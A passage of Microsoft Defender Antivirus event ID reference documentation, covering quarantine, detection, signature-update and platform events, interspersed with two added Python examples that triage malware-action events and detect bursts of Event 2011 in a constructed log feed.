Symbolic name: MALWAREPROTECTION_QUARANTINE_RESTORE_FAILED

Message: The antimalware platform couldn't restore an item from quarantine.

Description: Microsoft Defender Antivirus encountered an error trying to restore an item
from quarantine. For more information, see the following details:

Name: Threat name

ID: Threat ID

Severity: Severity. Examples: Low, Moderate, High, or Severe

Category: Category description, for example, any threat or malware type.

Path: File path

User: Domain\User

Error Code: Error code. Result code associated with threat status. Standard HRESULT
values.

Error Description: Error description. Description of the error.

Signature Version: Definition version

Engine Version: Antimalware Engine version

Event ID 1011
Symbolic name: MALWAREPROTECTION_QUARANTINE_DELETE

Message: The antimalware platform deleted an item from quarantine.

Description: Microsoft Defender Antivirus deleted an item from quarantine. For more
information, see the following details:

Name: Threat name

ID: Threat ID

Severity: Severity. Examples: Low, Moderate, High, or Severe

Category: Category description, for example, any threat or malware type.

Path: File path

User: Domain\User

Signature Version: Definition version

Engine Version: Antimalware Engine version

Event ID 1012
Symbolic name: MALWAREPROTECTION_QUARANTINE_DELETE_FAILED

Message: The antimalware platform couldn't delete an item from quarantine.

Description: Microsoft Defender Antivirus encountered an error trying to delete an item
from quarantine. For more information, see the following details:

Name: Threat name

ID: Threat ID

Severity: Severity. Examples: Low, Moderate, High, or Severe

Category: Category description, for example, any threat or malware type.

Path: File path

User: Domain\User

Error Code: Error code. Result code associated with threat status. Standard HRESULT
values.

Error Description: Error description. Description of the error.

Signature Version: Definition version

Engine Version: Antimalware Engine version

Event ID 1013
Symbolic name: MALWAREPROTECTION_MALWARE_HISTORY_DELETE

Message: The antimalware platform deleted history of malware and other potentially
unwanted software.

Description: Microsoft Defender Antivirus removed history of malware and other
potentially unwanted software.

Time: The time when the event occurred, for example when the history is purged.
This parameter isn't used in threat events, so that there's no confusion regarding
whether it's remediation time or infection time. For such events, we specifically call
them Action Time or Detection Time.

User: Domain\User

Event ID 1014
Symbolic name: MALWAREPROTECTION_MALWARE_HISTORY_DELETE_FAILED

Message: The antimalware platform couldn't delete history of malware and other
potentially unwanted software.

Description: Microsoft Defender Antivirus encountered an error trying to remove history
of malware and other potentially unwanted software.

Time: The time when the event occurred, for example when the history is purged.
This parameter isn't used in threat events, so that there's no confusion regarding
whether it's remediation time or infection time. For such events, we specifically call
them Action Time or Detection Time.

User: Domain\User

Error Code: Error code. Result code associated with threat status. Standard HRESULT
values.

Error Description: Error description. Description of the error.

Event ID 1015
Symbolic name: MALWAREPROTECTION_BEHAVIOR_DETECTED

Message: The antimalware platform detected suspicious behavior.

Description: Microsoft Defender Antivirus detected a suspicious behavior. For more
information, see the following details:

Name: Threat name

ID: Threat ID

Severity: Severity. Examples: Low, Moderate, High, or Severe

Category: Category description, for example, any threat or malware type.

Path: File path

Detection Origin: Detection origin. Examples: Unknown, Local computer, Network
share, Internet, Incoming traffic, or Outgoing traffic

Detection Type: Detection type. Examples: Heuristics, Generic, Concrete, or
Dynamic signature

Detection Source: Detection source, for example:

User: user initiated

System: system initiated

Real-time: real-time component initiated

IOAV: IE Downloads and Outlook Express Attachments initiated

NIS: Network inspection system

IEPROTECT: IE - IExtensionValidation; this source protects against malicious
webpage controls.

Early Launch Antimalware (ELAM). This source includes malware detected by the
boot sequence.

Remote attestation

Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PowerShell,
VBS), though it can be invoked by third parties as well.

UAC

Status: Status

User: Domain\User

Process Name: Process in the PID

Signature ID: Enumeration matching severity.

Signature Version: Definition version

Engine Version: Antimalware Engine version

Fidelity Label:

Target File Name: File name. Name of the file.

Event ID 1116
Symbolic name: MALWAREPROTECTION_STATE_MALWARE_DETECTED

Message: The antimalware platform detected malware or other potentially unwanted
software.

Description: Microsoft Defender Antivirus detected malware or other potentially
unwanted software. For more information, see the following details:

Name: Threat name

ID: Threat ID

Severity: Severity. Examples: Low, Moderate, High, or Severe

Category: Category description, for example, any threat or malware type.

Path: File path

Detection Origin: Detection origin. Examples: Unknown, Local computer, Network
share, Internet, Incoming traffic, or Outgoing traffic

Detection Type: Detection type. Examples: Heuristics, Generic, Concrete, or
Dynamic signature

Detection Source: Detection source, for example:

User: user initiated

System: system initiated

Real-time: real-time component initiated

IOAV: IE Downloads and Outlook Express Attachments initiated

NIS: Network inspection system

IEPROTECT: IE - IExtensionValidation; this protects against malicious webpage
controls.

Early Launch Antimalware (ELAM). This includes malware detected by the boot
sequence.

Remote attestation

Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PowerShell,
VBS), though it can be invoked by third parties as well.

UAC

User: Domain\User

Process Name: Process in the PID

Signature Version: Definition version

Engine Version: Antimalware Engine version

User action: No action is required. Microsoft Defender Antivirus can suspend and take
routine action on this threat. If you want to remove the threat manually, in the Microsoft
Defender Antivirus interface, select Clean Computer.

Event ID 1117
Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_TAKEN

Message: The antimalware platform performed an action to protect your system from
malware or other potentially unwanted software.

Description: Microsoft Defender Antivirus took action to protect this machine from
malware or other potentially unwanted software. For more information, see the
following details:

Name: Threat name

ID: Threat ID

Severity: Severity. Examples: Low, Moderate, High, or Severe

Category: Category description, for example, any threat or malware type.

Path: File path

Detection Origin: Detection origin. Examples: Unknown, Local computer, Network
share, Internet, Incoming traffic, or Outgoing traffic

Detection Type: Detection type. Examples: Heuristics, Generic, Concrete, or
Dynamic signature

Detection Source: Detection source, for example:

User: user initiated

System: system initiated

Real-time: real-time component initiated

IOAV: IE Downloads and Outlook Express Attachments initiated

NIS: Network inspection system

IEPROTECT: IE - IExtensionValidation; this source protects against malicious
webpage controls.

Early Launch Antimalware (ELAM). This includes malware detected by the boot
sequence.

Remote attestation

Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PowerShell,
VBS), though it can be invoked by third parties as well.

UAC

User: Domain\User

Process Name: Process in the PID

Action: Action. Examples:

Clean: The resource was cleaned.

Quarantine: The resource was quarantined.

Remove: The resource was deleted.

Allow: The resource was allowed to execute/exist.

User defined: User-defined action that's typically from this list of actions
specified by the user.

No action: No action

Block: The resource was blocked from executing.

Action Status: Description of other actions

Error Code: Error code. Result code associated with threat status. Standard HRESULT
values.

Error Description: Error description. Description of the error.

Signature Version: Definition version

Engine Version: Antimalware Engine version

NOTE: Whenever Microsoft Defender Antivirus, Microsoft Security Essentials, Malicious
Software Removal Tool, or System Center Endpoint Protection detects malware, it
restores the following system settings and services that might have been changed by
the malware:

- Default Internet Explorer or Microsoft Edge setting

- User Access Control settings

- Chrome settings

- Boot Control Data

- Regedit and Task Manager registry settings

- Windows Update, Background Intelligent Transfer Service, and Remote
Procedure Call service

- Windows Operating System files

The above context applies to the following client and server versions:

- Operating system: Client Operating System

Operating system version: Windows Vista (Service Pack 1, or Service Pack 2),
Windows 7 and later

- Operating system: Server Operating System

Operating system version: Windows Server 2008, Windows Server 2008 R2,
Windows Server 2012, and Windows Server 2016

User action: No action is necessary. Microsoft Defender Antivirus removed or
quarantined a threat.

Event ID 1118
Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_FAILED

Message: The antimalware platform attempted to perform an action to protect your
system from malware or other potentially unwanted software, but the action failed.

Description: Microsoft Defender Antivirus encountered a noncritical error when taking
action on malware or other potentially unwanted software. For more information, see
the following details:

Name: Threat name

ID: Threat ID

Severity: Severity. Examples: Low, Moderate, High, or Severe

Category: Category description, for example, any threat or malware type.

Path: File path

Detection Origin: Detection origin. Examples: Unknown, Local computer, Network
share, Internet, Incoming traffic, or Outgoing traffic

Detection Type: Detection type. Examples: Heuristics, Generic, Concrete, or
Dynamic signature

Detection Source: Detection source, for example:

User: user initiated

System: system initiated

Real-time: real-time component initiated

IOAV: IE Downloads and Outlook Express Attachments initiated

NIS: Network inspection system

IEPROTECT: IE - IExtensionValidation; this protects against malicious webpage
controls.

Early Launch Antimalware (ELAM). This includes malware detected by the boot
sequence.

Remote attestation

Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PowerShell,
VBS), though it can be invoked by third parties as well.

UAC

User: Domain\User

Process Name: Process in the PID

Action: Action. Examples:

Clean: The resource was cleaned.

Quarantine: The resource was quarantined.

Remove: The resource was deleted.

Allow: The resource was allowed to execute/exist

User defined: User-defined action that's typically from this list of actions
specified by the user.

No action: No action

Block: The resource was blocked from executing

Action Status: Description of additional actions

Error Code: Error code. Result code associated with threat status. Standard HRESULT
values.

Error Description: Error description. Description of the error.

Signature Version: Definition version

Engine Version: Antimalware Engine version

User action: No action is necessary. Microsoft Defender Antivirus failed to complete a
task related to the malware remediation. This isn't a critical failure.

Event ID 1119
Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_CRITICALLY_FAILED

Message: The antimalware platform encountered a critical error when trying to take
action on malware or other potentially unwanted software. There are more details in the
event message.

Description: Microsoft Defender Antivirus encountered a critical error when taking
action on malware or other potentially unwanted software. For more information, see
the following details:

Name: Threat name

ID: Threat ID

Severity: Severity. Examples: Low, Moderate, High, or Severe

Category: Category description, for example, any threat or malware type.

Path: File path

Detection Origin: Detection origin. Examples: Unknown, Local computer, Network
share, Internet, Incoming traffic, or Outgoing traffic

Detection Type: Detection type. Examples: Heuristics, Generic, Concrete, or
Dynamic signature

Detection Source: Detection source, for example:

User: user initiated

System: system initiated

Real-time: real-time component initiated

IOAV: IE Downloads and Outlook Express Attachments initiated

NIS: Network inspection system

IEPROTECT: IE - IExtensionValidation; this protects against malicious webpage
controls.

Early Launch Antimalware (ELAM). This includes malware detected by the boot
sequence.

Remote attestation

Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PowerShell,
VBS), though it can be invoked by third parties as well.

UAC

User: Domain\User

Process Name: Process in the PID

Action: Action. Examples:

Clean: The resource was cleaned

Quarantine: The resource was quarantined.

Remove: The resource was deleted.

Allow: The resource was allowed to execute/exist.

User defined: User-defined action that's typically from this list of actions
specified by the user.

No action: No action

Block: The resource was blocked from executing.

Action Status: Description of other actions

Error Code: Error code. Result code associated with threat status. Standard HRESULT
values.

Error Description: Error description. Description of the error.

Signature Version: Definition version

Engine Version: Antimalware Engine version

User action: The Microsoft Defender Antivirus client encountered this error due to
critical issues. The endpoint might not be protected. Review the error description then
follow the relevant User action steps.

Action: Remove. User action: Update the definitions, then verify that the removal
was successful.

Action: Clean. User action: Update the definitions, then verify that the remediation
was successful.

Action: Quarantine. User action: Update the definitions and verify that the user has
permission to access the necessary resources.

Action: Allow. User action: Verify that the user has permission to access the
necessary resources.

If this event persists:

Run the scan again.

If it fails in the same way, go to the Microsoft Support site, enter the error
number in the Search box to look for the error code.

Contact Microsoft Technical Support.
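The user actions documented for Event IDs 1116 through 1119 above (including the per-action steps for a critical 1119 failure) lend themselves to automated triage. The following is an added example, not Microsoft's code; the event records, threat names and HRESULT strings in it are constructed samples.

```python
"""Triage of Microsoft Defender Antivirus malware-action events (1116-1119).

Added example, not Microsoft's code. It encodes the user actions documented
for Event IDs 1116, 1117, 1118 and 1119 (including the per-action steps for
1119) so a SOC script can separate critical failures from routine noise.
The event records below are constructed samples, not real log data.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Event ID 1119: documented remediation step per failed action.
CRITICAL_ACTION_GUIDANCE: Dict[str, str] = {
    "Remove": "Update the definitions, then verify that the removal was successful.",
    "Clean": "Update the definitions, then verify that the remediation was successful.",
    "Quarantine": ("Update the definitions and verify that the user has permission "
                   "to access the necessary resources."),
    "Allow": "Verify that the user has permission to access the necessary resources.",
}

# Documented guidance when a 1119 keeps recurring for the same threat/action.
PERSISTENT_GUIDANCE = ("Run the scan again; if it fails the same way, search the "
                       "error code on the Microsoft Support site, then contact support.")


@dataclass(frozen=True)
class DefenderEvent:
    event_id: int
    threat_name: str
    severity: str                       # Low, Moderate, High, or Severe
    action: Optional[str] = None        # Clean, Quarantine, Remove, Allow, ...
    error_code: Optional[str] = None    # HRESULT as a hex string


@dataclass(frozen=True)
class Triage:
    endpoint_protected: bool   # False only where the documentation says it might not be
    escalate: bool             # True when an analyst has to act
    advice: str


def triage(ev: DefenderEvent) -> Triage:
    """Map one event to the documented user action."""
    if ev.event_id == 1116:
        return Triage(True, False, "No action is required; Defender Antivirus "
                                   "takes routine action on this threat.")
    if ev.event_id == 1117:
        return Triage(True, False, "No action is necessary; the threat was "
                                   "removed or quarantined.")
    if ev.event_id == 1118:
        return Triage(True, False, "Noncritical remediation failure; no action "
                                   "is necessary.")
    if ev.event_id == 1119:
        step = CRITICAL_ACTION_GUIDANCE.get(
            ev.action or "", "Review the error description, then follow the "
                             "relevant user action steps.")
        return Triage(False, True,
                      f"Critical failure (error {ev.error_code}); the endpoint "
                      f"might not be protected. {step}")
    return Triage(True, False, "Event ID not covered by this triage table.")


def persistent_critical_failures(events: List[DefenderEvent],
                                 threshold: int = 2) -> List[Tuple[str, str]]:
    """(threat, action) pairs that raised 1119 at least `threshold` times;
    these are the cases where PERSISTENT_GUIDANCE applies."""
    counts = Counter((e.threat_name, e.action or "")
                     for e in events if e.event_id == 1119)
    return sorted(pair for pair, n in counts.items() if n >= threshold)


# Constructed sample feed (placeholder threat names and HRESULT strings):
# one routine detection, one successful action, a repeated critical failure
# for one threat, and a single critical failure with another action.
SAMPLE_EVENTS = [
    DefenderEvent(1116, "Trojan:Sample/A", "Severe"),
    DefenderEvent(1117, "Trojan:Sample/A", "Severe", action="Quarantine"),
    DefenderEvent(1119, "Trojan:Sample/B", "High", "Remove", "0x80500001"),
    DefenderEvent(1119, "Trojan:Sample/B", "High", "Remove", "0x80500001"),
    DefenderEvent(1119, "PUA:Sample/C", "Moderate", "Allow", "0x80500002"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        t = triage(ev)
        print(ev.event_id, ev.threat_name, "ESCALATE" if t.escalate else "ok", t.advice)
    for pair in persistent_critical_failures(SAMPLE_EVENTS):
        print("persistent 1119 for", pair, "->", PERSISTENT_GUIDANCE)
```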

Event ID 1120
Symbolic name: MALWAREPROTECTION_THREAT_HASH

Message: Microsoft Defender Antivirus deduced the hashes for a threat resource.

Description: Microsoft Defender Antivirus client is up and running in a healthy state.

Current Platform Version: Current platform version

Threat Resource Path: Path

Hashes: Hashes

Note: This event will only be logged if the following policy is set: ThreatFileHashLogging
unsigned.

Event ID 1121
Message: Event when an attack surface reduction rule fires in block mode.

Description:

Current Platform Version: Current platform version

Threat Resource Path: Path

Hashes: Hashes

Event ID 1127
Symbolic name: MALWAREPROTECTION_FOLDER_GUARD_SECTOR_BLOCK

Message: Controlled Folder Access (CFA) blocked an untrusted process from making
changes to the memory.

Description: Controlled Folder Access blocked an untrusted process from potentially
modifying disk sectors. For more information about the event record, see the following
details:

EventID: EventID. Examples: 1127

Version: Version. Examples: 0

Level: Level. Examples: win: Warning

TimeCreated: SystemTime, time when the event was created.

EventRecordID: EventRecordID, index number of the event in the event log

Execution ProcessID: Execution ProcessID, process that generated the event

Channel: Event channel. Examples: Microsoft-Windows-Windows Defender/Operational

Computer: Computer name

Security UserID: Security UserID

Product Name: Product Name. Examples: Microsoft Defender Antivirus

Product Version: Product Version

Detection Time: Detection Time, time when CFA blocked an untrusted process

User: Domain\User

Path: Device name, name of the device or disk that an untrusted process accessed
for modification

Process Name: Process path, the process path name that CFA blocked from
accessing the device or disk for modification

Security Intelligence Version: Security intelligence version

Engine Version: Antimalware Engine version

User action: The user can add the blocked process to the Allowed Process list for CFA,
using PowerShell or Windows Security Center.

Event ID 1150
Symbolic name: MALWAREPROTECTION_SERVICE_HEALTHY

Message: If your antimalware platform reports status to a monitoring platform, this
event indicates that the antimalware platform is running and in a healthy state.

Description: Microsoft Defender Antivirus client is up and running in a healthy state.

Platform Version: Current platform version

Signature Version: Definition version

Engine Version: Antimalware Engine version

User action: No action is necessary. The Microsoft Defender Antivirus client is in a
healthy state. This event is reported on an hourly basis.

Event ID 1151
Symbolic name: MALWAREPROTECTION_SERVICE_HEALTH_REPORT

Message: Endpoint Protection client health report (time in UTC)

Description: Antivirus client health report.

Platform Version: Current platform version

Engine Version: Antimalware Engine version

Network Realtime Inspection engine version: Network Realtime Inspection engine
version

Antivirus signature version: Antivirus signature version

Antispyware signature version: Antispyware signature version

Network Realtime Inspection signature version: Network Realtime Inspection
signature version

RTP state: Realtime protection state (Enabled or Disabled)

OA state: On Access state (Enabled or Disabled)

IOAV state: IE Downloads and Outlook Express Attachments state (Enabled or
Disabled)

BM state: Behavior Monitoring state (Enabled or Disabled)

Antivirus signature age: Antivirus signature age (in days)

Antispyware signature age: Antispyware signature age (in days)

Last quick scan age: Last quick scan age (in days)

Last full scan age: Last full scan age (in days)

Antivirus signature creation time: Antivirus signature creation time

Antispyware signature creation time: Antispyware signature creation time

Last quick scan start time: Last quick scan start time

Last quick scan end time: Last quick scan end time

Last quick scan source: Last quick scan source (0 = scan didn't run, 1 = user
initiated, 2 = system initiated)

Last full scan start time: Last full scan start time

Last full scan end time: Last full scan end time

Last full scan source: Last full scan source (0 = scan didn't run, 1 = user initiated, 2
= system initiated)

Product status: For internal troubleshooting

Event ID 2000
Symbolic name: MALWAREPROTECTION_SIGNATURE_UPDATED

Message: The antimalware definitions updated successfully.

Description: Antivirus signature version was updated.

Current Signature Version: Current signature version

Previous Signature Version: Previous signature version

Signature Type: Signature type. Examples: Antivirus, Antispyware, Antimalware, or
Network Inspection System

Update Type: Update type, either Full or Delta.

User: Domain\User

Current Engine Version: Current engine version

Previous Engine Version: Previous engine version

User action: No action is necessary. The Microsoft Defender Antivirus client is in a
healthy state. This event is reported when signatures are successfully updated.

Event ID 2001
Symbolic name: MALWAREPROTECTION_SIGNATURE_UPDATE_FAILED

Message: The security intelligence update failed.

Description: Microsoft Defender Antivirus encountered an error trying to update
signatures.

New security intelligence version: New version number

Previous security intelligence version: Previous version

Update Source: Update source. Examples:

Security intelligence update folder

Internal security intelligence update server

Microsoft Update Server

File share

Microsoft Malware Protection Center (MMPC)

Update Stage: Update stage. Examples: Search, Download, or Install

Source Path: File share name for Universal Naming Convention (UNC), server name
for Windows Server Update Services (WSUS)/Microsoft Update/ADL.

Signature Type: Signature type. Examples: Antivirus, Antispyware, Antimalware, or
Network Inspection System

Update Type: Update type, either Full or Delta.

User: Domain\User

Current Engine Version: Current engine version

Previous Engine Version: Previous engine version

Error Code: Error code. Result code associated with threat status. Standard HRESULT
values.

Error Description: Error description. Description of the error.

User action: This error occurs when there's a problem updating definitions. To
troubleshoot this event:

Update definitions and force a rescan directly on the endpoint.

Review the entries in the %Windir%\WindowsUpdate.log file for more information
about this error.

Contact Microsoft Technical Support.

Event ID 2002
Symbolic name: MALWAREPROTECTION_ENGINE_UPDATED

Message: The antimalware engine updated successfully.

Description: Microsoft Defender Antivirus engine version was updated.

Current Engine Version: Current engine version

Previous Engine Version: Previous engine version

Engine Type: Engine type, either antimalware engine or Network Inspection System
engine.

User: Domain\User

User action: No action is necessary. The Microsoft Defender Antivirus client is in a
healthy state. This event is reported when the antimalware engine is successfully
updated.

Event ID 2003
Symbolic name: MALWAREPROTECTION_ENGINE_UPDATE_FAILED

Message: The antimalware engine update failed.

Description: Microsoft Defender Antivirus encountered an error trying to update the
engine.

New Engine Version:

Previous Engine Version: Previous engine version

Engine Type: Engine type, either antimalware engine or Network Inspection System
engine.

User: Domain\User

Error Code: Error code. Result code associated with threat status. Standard HRESULT
values.

Error Description: Error description. Description of the error.

User action: The Microsoft Defender Antivirus client update failed. This event occurs
when the client fails to update itself. This event is due to an interruption in network
connectivity during an update. To troubleshoot this event:

Update definitions and force a rescan directly on the endpoint.

Contact Microsoft Technical Support.

Event ID 2004
Symbolic name: MALWAREPROTECTION_SIGNATURE_REVERSION

Message: There was a problem loading antimalware definition. The antimalware engine
attempts to load the last-known good set of definitions.

Description: Microsoft Defender Antivirus encountered an error trying to load signatures
and will attempt reverting back to a known-good set of signatures.

Signatures Attempted:

Error Code: Error code. Result code associated with threat status. Standard HRESULT
values.

Error Description: Error description. Description of the error.

Signature Version: Definition version

Engine Version: Antimalware engine version

User action: The Microsoft Defender Antivirus client attempted to download and install
the latest definitions file and failed. This error can occur when the client encounters an
error while trying to load the definitions, or if the file is corrupt. Microsoft Defender
Antivirus attempts to revert back to a known-good set of definitions. To troubleshoot
this event:

Restart the computer and try again.

Download the latest definitions from the Microsoft Security Intelligence site.

Note: The size of the definitions file downloaded from the site can exceed 60 MB
and shouldn't be used as a long-term solution for updating definitions.

Contact Microsoft Technical Support.

Event ID 2005
Symbolic name: MALWAREPROTECTION_ENGINE_UPDATE_PLATFORMOUTOFDATE

Message: The antimalware engine failed to load because the antimalware platform is out
of date. The antimalware platform loads the last-known good antimalware engine and
attempts to update.

Description: Microsoft Defender Antivirus couldn't load the antimalware engine because
the current platform version isn't supported. Microsoft Defender Antivirus reverts back to
the last known-good engine and a platform update will be attempted.

Current Platform Version: Current platform version

Event ID 2006
Symbolic name: MALWAREPROTECTION_PLATFORM_UPDATE_FAILED

Message: The platform update failed.

Description: Microsoft Defender Antivirus encountered an error trying to update the
platform.

Current Platform Version: Current platform version

Error Code: Error code. Result code associated with threat status. Standard HRESULT
values.

Error Description: Error description. Description of the error.

Event ID 2007
Symbolic name: MALWAREPROTECTION_PLATFORM_ALMOSTOUTOFDATE

Message: The platform will soon be out of date. Download the latest platform to
maintain up-to-date protection.

Description: Microsoft Defender Antivirus will soon require a newer platform version to
support future versions of the antimalware engine. Download the latest Microsoft
Defender Antivirus platform to maintain the best level of protection available.

Current Platform Version: Current platform version

Event ID 2010
Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_UPDATED

Message: The antimalware engine used the Dynamic Signature Service to get other
definitions.

Description: Microsoft Defender Antivirus used Dynamic Signature Service to retrieve
more signatures to help protect your machine.

Current Signature Version: Current signature version

Signature Type: Signature type. Examples: Antivirus, Antispyware, Antimalware, or
Network Inspection System

Current Engine Version: Current engine version

Dynamic Signature Type: Dynamic signature type. Examples: Version, Timestamp,
No limit, or Duration

Persistence Path: Path

Dynamic Signature Version: Version number

Dynamic Signature Compilation Timestamp: Timestamp

Persistence Limit Type: Persistence limit type. Examples: VDM version, Timestamp,
or No limit

Persistence Limit: Persistence limit of the fastpath signature.

Event ID 2011
Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_DELETED

Message: The Dynamic Signature Service deleted the out-of-date dynamic definitions.

Change to default behavior: Change to dynamic signature event reporting default
behavior.

When a dynamic signature is received by MDE, a 2010 event is reported. However, when
the dynamic signature expires or is manually deleted a 2011 event is reported. In some
cases, when a new signature is delivered to MDE sometimes hundreds of dynamic
signatures expire at the same time; therefore hundreds of 2011 events are reported. The
generation of so many 2011 events can cause a Security information and event
management (SIEM) server to become flooded.

To avoid the previously described situation - starting with platform version 4.18.2207.7 -
by default, Defender for Endpoint doesn't report 2011 events:

This new default behavior is controlled by registry entry:

HKLM\SOFTWARE\Microsoft\Windows Defender\Reporting\EnableDynamicSignatureDroppedEventReporting

The default value for EnableDynamicSignatureDroppedEventReporting is false, which
means 2011 events aren't reported. If it's set to true, 2011 events are reported.

Because 2010 signature events are timely distributed sporadically - and won't cause a
spike - 2010 signature event behavior is unchanged.
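The platform-version threshold and registry value described above decide whether an endpoint is expected to emit 2011 events at all, and the SIEM-side symptom of the problem is a burst of 2011 records. The following added example (not Microsoft's code) applies that rule and measures the burst; it assumes the registry value has already been read elsewhere and is passed in as an integer DWORD (0/1) or None when absent, and the event feed is constructed.

```python
"""Event ID 2011 reporting: expected volume per endpoint and burst detection.

Added example, not Microsoft's code. It applies the rule documented above:
from platform version 4.18.2207.7 the EnableDynamicSignatureDroppedEventReporting
registry value (default false) decides whether 2011 is logged; older platforms
always log it. Assumptions: the registry value is read elsewhere and passed in
as an integer DWORD (0/1) or None when absent; feed records are
(ISO 8601 timestamp, event id) pairs. The sample feed and the platform versions
other than 4.18.2207.7 are constructed.
"""
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

SUPPRESS_FROM = (4, 18, 2207, 7)   # documented platform version threshold
REG_VALUE_NAME = "EnableDynamicSignatureDroppedEventReporting"


def parse_platform_version(version: str) -> Tuple[int, ...]:
    """'4.18.2207.7' -> (4, 18, 2207, 7), so versions compare numerically."""
    return tuple(int(part) for part in version.split("."))


def reports_2011(platform_version: str, reg_value: Optional[int]) -> bool:
    """True if this endpoint is expected to log 2011 events.

    Older platforms always report. From 4.18.2207.7 the default is not to
    report; only an explicit true (non-zero) registry value re-enables it.
    """
    if parse_platform_version(platform_version) < SUPPRESS_FROM:
        return True
    return bool(reg_value)


def max_events_in_window(feed: List[Tuple[str, int]], event_id: int,
                         window: timedelta) -> int:
    """Largest number of `event_id` records that fall within any `window`.

    A high value for 2011 is the SIEM flood the page warns about, which points
    at mass dynamic-signature expiry rather than at an incident.
    """
    times = sorted(datetime.fromisoformat(ts) for ts, eid in feed if eid == event_id)
    best, j = 0, 0
    for i, start in enumerate(times):           # sliding window over sorted times
        while j < len(times) and times[j] - start < window:
            j += 1
        best = max(best, j - i)
    return best


def max_2011_per_minute(feed: List[Tuple[str, int]]) -> int:
    return max_events_in_window(feed, 2011, timedelta(minutes=1))


def build_sample_feed() -> List[Tuple[str, int]]:
    """Constructed feed: three sporadic 2010 events over the preceding hours,
    then 200 dynamic signatures expiring within 20 seconds (200 x 2011)."""
    base = datetime(2024, 1, 19, 10, 0, 0)
    feed = [((base - timedelta(hours=h)).isoformat(), 2010) for h in (6, 3, 1)]
    feed += [((base + timedelta(milliseconds=100 * i)).isoformat(), 2011)
             for i in range(200)]
    return feed


if __name__ == "__main__":
    print("4.18.2207.6, value absent:", reports_2011("4.18.2207.6", None))   # True
    print("4.18.2207.7, value absent:", reports_2011("4.18.2207.7", None))   # False
    print("4.18.2207.7, value 1:    ", reports_2011("4.18.2207.7", 1))      # True
    feed = build_sample_feed()
    print("max 2011 per minute:", max_2011_per_minute(feed))                # 200
    print("max 2010 per minute:",
          max_events_in_window(feed, 2010, timedelta(minutes=1)))           # 1
```

Using the two functions together: an endpoint for which reports_2011 is False but that still shows a 2011 burst has had the registry value changed, which is itself worth a look.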

Description: Microsoft Defender Antivirus used Dynamic Signature Service to discard
obsolete signatures.

Current Signature Version: Current signature version

Signature Type: Signature type. Examples: Antivirus, Antispyware, Antimalware, or
Network Inspection System

Current Engine Version: Current engine version

Dynamic Signature Type: Dynamic signature type. Examples: Version, Timestamp,
No limit, or Duration

Persistence Path: Path

Dynamic Signature Version: Version number

Dynamic Signature Compilation Timestamp: Timestamp

Removal Reason:

Persistence Limit Type: Persistence limit type. Examples: VDM version, Timestamp,
or No limit

Persistence Limit: Persistence limit of the fastpath signature.

User action: No action is necessary. The Microsoft Defender Antivirus client is in a
healthy state. This event is reported when the Dynamic Signature Service successfully
deletes out-of-date dynamic definitions.

Event ID 2012
Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_UPDATE_FAILED

Message: The antimalware engine encountered an error when trying to use the Dynamic
Signature Service.

Description: Microsoft Defender Antivirus encountered an error trying to use Dynamic
Signature Service.

Current Signature Version: Current signature version

Signature Type: Signature type. Examples: Antivirus, Antispyware, Antimalware, or
Network Inspection System

Current Engine Version: Current engine version

Error Code: Error code. Result code associated with threat status. Standard HRESULT
values.

Error Description: Error description. Description of the error.

Dynamic Signature Type: Dynamic signature type. Examples: Version, Timestamp,
No limit, or Duration

Persistence Path: Path

Dynamic Signature Version: Version number

Dynamic Signature Compilation Timestamp: Timestamp

Persistence Limit Type: Persistence limit type. Examples: VDM version, Timestamp,
or No limit

Persistence Limit: Persistence limit of the fastpath signature.

User action: Check your Internet connectivity settings.

Event ID 2013
Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_DELETED_ALL

Message: The Dynamic Signature Service deleted all dynamic definitions.

Description: Microsoft Defender Antivirus discarded all Dynamic Signature Service signatures.

Current Signature Version: Current signature version

Event ID 2020
Symbolic name: MALWAREPROTECTION_CLOUD_CLEAN_RESTORE_FILE_DOWNLOADED

Message: The antimalware engine downloaded a clean file.

Description: Microsoft Defender Antivirus downloaded a clean file.

Filename: Name of the file.

Current Signature Version: Current signature version

Current Engine Version: Current engine version

Event ID 2021
Symbolic name: MALWAREPROTECTION_CLOUD_CLEAN_RESTORE_FILE_DOWNLOAD_FAILED

Message: The antimalware engine failed to download a clean file.

Description: Microsoft Defender Antivirus encountered an error trying to download a clean file.

Filename: Name of the file.

Current Signature Version: Current signature version

Current Engine Version: Current engine version

Error Code: Result code associated with threat status. Standard HRESULT values.

Error Description: Description of the error.

User action: Check your Internet connectivity settings. The Microsoft Defender Antivirus client encountered an error when using the Dynamic Signature Service to download the latest definitions for a specific threat. This error is likely caused by a network connectivity issue.

Event ID 2030
Symbolic name: MALWAREPROTECTION_OFFLINE_SCAN_INSTALLED

Message: The antimalware engine was downloaded and is configured to run offline on
the next system restart.

Description: Microsoft Defender Antivirus downloaded and configured offline antivirus to run on the next reboot.

Event ID 2031
Symbolic name: MALWAREPROTECTION_OFFLINE_SCAN_INSTALL_FAILED

Message: The antimalware engine was unable to download and configure an offline
scan.

Description: Microsoft Defender Antivirus encountered an error trying to download and configure offline antivirus.

Error Code: Result code associated with threat status. Standard HRESULT values.

Error Description: Description of the error.

Event ID 2040
Symbolic name: MALWAREPROTECTION_OS_EXPIRING

Message: Antimalware support for this operating system version will soon end.

Description: The support for your operating system expires shortly. Running Microsoft
Defender Antivirus on an out of support operating system isn't an adequate solution to
protect against threats.

Event ID 2041
Symbolic name: MALWAREPROTECTION_OS_EOL

Message: Antimalware support for this operating system has ended. You must upgrade the operating system for continued support.

Description: The support for your operating system has expired. Running Microsoft Defender Antivirus on an out-of-support operating system isn't an adequate solution to protect against threats.

Event ID 2042
Symbolic name: MALWAREPROTECTION_PROTECTION_EOL

Message: The antimalware engine no longer supports this operating system, and is no
longer protecting your system from malware.

Description: The support for your operating system has expired. Microsoft Defender
